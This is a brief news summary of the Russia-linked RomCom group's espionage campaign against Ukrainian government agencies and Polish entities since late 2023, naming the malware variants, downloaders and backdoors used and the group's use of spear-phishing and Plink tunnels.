<ul><li>Russia-linked threat actor RomCom targeted Ukrainian government agencies and Polish entities in cyber attacks since late 2023.</li><li>RomCom deployed an updated variant of the RomCom RAT called 'SingleCamper' and used two new downloaders, RustClaw and MeltingClaw, along with two backdoors, DustyHammock and ShadyHammock.</li><li>RomCom is focusing on data exfiltration from Ukrainian targets, using various tools and malware languages for long-term espionage access.</li><li>The group employed spear-phishing messages and established remote tunnels using PuTTY's Plink tool to connect with attacker-controlled servers.</li></ul>

Russia-linked RomCom group targeted Ukrainian government agencies since late 2023

Discover more